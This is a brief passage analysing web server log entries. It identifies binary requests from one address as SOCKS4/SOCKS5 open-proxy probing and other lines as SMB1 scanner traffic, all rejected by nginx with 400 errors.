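Applied to the two binary lines from 180.97.106.37 it reports a SOCKS4 CONNECT to 180.163.113.82:80 (the same host that address had requested as /check_proxy earlier) and a SOCKS5 greeting, i.e. open-proxy probing rather than an exploit. The SMB lines are SMB1 Negotiate Protocol requests from port-445 scanners that hit port 80; nginx rejects all of them with 400.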
